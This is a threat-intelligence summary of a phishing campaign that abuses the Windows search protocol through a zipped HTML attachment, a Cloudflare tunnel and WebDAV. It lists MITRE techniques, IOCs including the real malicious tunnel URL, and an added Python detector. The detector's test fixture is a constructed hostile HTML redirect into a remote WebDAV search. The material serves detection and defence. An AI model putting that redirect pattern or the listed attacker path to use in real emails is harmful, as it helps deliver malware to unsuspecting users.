Trustwave SpiderLabs has uncovered a sophisticated campaign that hides malicious activity inside an HTML attachment zipped in a phishing email to abuse Windows search. The operation relies on HTML, a meta refresh redirect, Cloudflare tunneling, and a single LNK file that points to a BAT script, requiring user interaction to proceed. #TrustwaveSpiderLabs #WindowsSearch
Key points
- The campaign begins with a suspicious email containing an HTML attachment wrapped in a ZIP archive to evade email scanners.
- The HTML attachment uses a meta refresh with zero delay to automatically redirect via the Windows search protocol to a remote server.
- The attack exploits the search protocol by crafting query parameters (invoice-focused) and directing traffic through Cloudflare tunneling and WebDAV to present remote resources as local.
- After user consent, the search retrieves invoice-named files from the remote server; the results include a shortcut (LNK) that points to a BAT script on that server.
- The BAT payload could not be retrieved during analysis because the server appeared down, but the delivery chain demonstrates a high level of sophistication in abusing user behavior and Windows features.
- Mitigation includes disabling the search URI handler (registry edits) and updates deployed to identify the HTML pattern used in this abuse (MailMarshal customers).
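An added detection example (not code from Trustwave or the original post) for the HTML pattern described above: it parses an attachment for a meta refresh whose target is a Windows search-protocol URI and flags a remote WebDAV location crumb. The sample HTML and the tunnel hostname are constructed placeholders, and the `search:`/`search-ms:` parameter layout (`query`, `crumb=location:`, `displayname`) is assumed from the standard search-ms URI format.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample (not from the campaign): zero-delay meta refresh into the Windows
# search protocol with an invoice query and a WebDAV location on a placeholder tunnel host.
SAMPLE_HTML = r"""<html><head><meta http-equiv="refresh"
content="0;url=search:query=INVOICE&crumb=location:\\example-tunnel.trycloudflare.com@SSL\DavWWWRoot\google\INVOICE&displayname=Downloads">
</head><body>Loading your invoice...</body></html>"""
# Constructed benign control: an ordinary delayed HTTPS redirect, which must not be flagged.
BENIGN_HTML = '<meta http-equiv="refresh" content="5;url=https://example.com/">'
SEARCH_SCHEMES = ("search:", "search-ms:")

class MetaRefreshCollector(HTMLParser):
    """Collect (delay_seconds, url) from every <meta http-equiv="refresh"> tag."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*(.+)", a.get("content", ""), re.I | re.S)
        if m:
            self.targets.append((int(m.group(1)), m.group(2).strip().strip("'\"")))

def analyze_html(html):
    """One finding per meta refresh whose target is a search:/search-ms: URI."""
    p = MetaRefreshCollector()
    p.feed(html)
    findings = []
    for delay, url in p.targets:
        low = unquote(url).lower()
        if not low.startswith(SEARCH_SCHEMES):
            continue
        # Parameters follow the scheme: query=...&crumb=location:...&displayname=...
        params = dict(kv.split("=", 1) for kv in low.split(":", 1)[1].split("&") if "=" in kv)
        crumb = params.get("crumb", "")
        loc = crumb[len("location:"):] if crumb.startswith("location:") else ""
        findings.append({
            "delay": delay,
            "query": params.get("query", ""),
            "remote_location": loc.startswith("\\\\"),  # UNC path: results come from a remote host
            "webdav": "davwwwroot" in loc or "@ssl" in loc,
            "cloudflare_tunnel": "trycloudflare.com" in loc,
            "invoice_lure": "invoice" in params.get("query", "") or "invoice" in loc,
        })
    return findings
```

A mail gateway rule would alert on any finding with `remote_location` set, since a legitimate page has no reason to redirect a reader into a search served over WebDAV.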
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The HTML attachment in the ZIP is used to deceive and deliver the exploit. “The HTML attachment in this campaign, while seemingly simple, is crafted to launch a sophisticated attack.”
- [T1027] Obfuscated/Compressed Files and Information – The HTML is compressed inside a ZIP to evade scanners. “This extra layer of obfuscation serves multiple purposes: Shrinks the file size for faster transmission; Sidesteps scanners that may overlook compressed contents.”
- [T1204] User Execution – The user is prompted to allow the search action, enabling the malicious operation. “When the HTML loads, browsers typically prompt the user to allow the search action. This security measure prevents unauthorized commands from executing potentially harmful operations without the user’s consent.”
- [T1090] Proxy – Attackers used Cloudflare tunneling (and WebDAV to present remote resources as local) to hide infrastructure and deceive. “Attackers abused Cloudflare’s tunneling service to hide their servers and mask their malicious operations.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The LNK in the search results points to a BAT script, which could run if the user clicks the shortcut. “which, upon user click, could potentially trigger additional malicious operations.”
- [T1105] Ingress Tool Transfer – The search retrieves invoice-named files from a remote server, including an LNK that points to a BAT script hosted on the same server. “The search retrieves invoice-named files from a remote server. Only one item, particularly a shortcut (LNK) file, appears in the search results.”
Indicators of Compromise
- [File name] INVOICE#TBAVSA0JBSNA.html – The HTML attachment referenced in IOC context.
- [MD5] f77a4a27f749703165e2021fecd73db9 – Hash of the HTML payload.
- [SHA1] cbc3a8e762e0f2eda9e8a9bde348d04d1d7ce17e – Hash of the HTML payload.
- [SHA256] d136dcfc355885c502ff2c3be229791538541b748b6c07df3ced95f9a7eb2f30 – Hash of the HTML payload.
- [URL] tender-coding-bi-associate[.]trycloudflare[.]com@SSL\DavWWWRoot\google\INVOICE – Remote server (WebDAV path) hosting the malicious content.